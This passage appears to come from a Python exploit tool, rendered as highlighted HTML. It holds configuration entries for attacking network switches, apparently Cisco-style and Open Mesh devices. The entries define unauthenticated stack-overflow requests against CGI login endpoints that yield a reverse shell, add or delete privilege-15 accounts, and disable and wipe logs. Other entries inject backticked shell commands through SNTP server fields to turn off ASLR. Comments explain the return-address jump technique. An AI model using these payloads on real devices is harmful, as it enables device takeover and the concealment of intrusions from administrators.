						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span><span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'OpenMESH'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Open Mesh, Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/loginMsg.js'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'security.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">280</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'datajson.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn_httpupload.cgi?'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># &lt;================================</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># It is vulnerable, but I am not using this authenticated code here :&gt;</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token comment"># Bonus: Disable and clean logs</span>
					<span class="token comment">#</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;en=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=0'</span><span class="token punctuation">,</span>					<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=1'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sp=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check`&amp;sp=123'</span><span class="token punctuation">,</span>

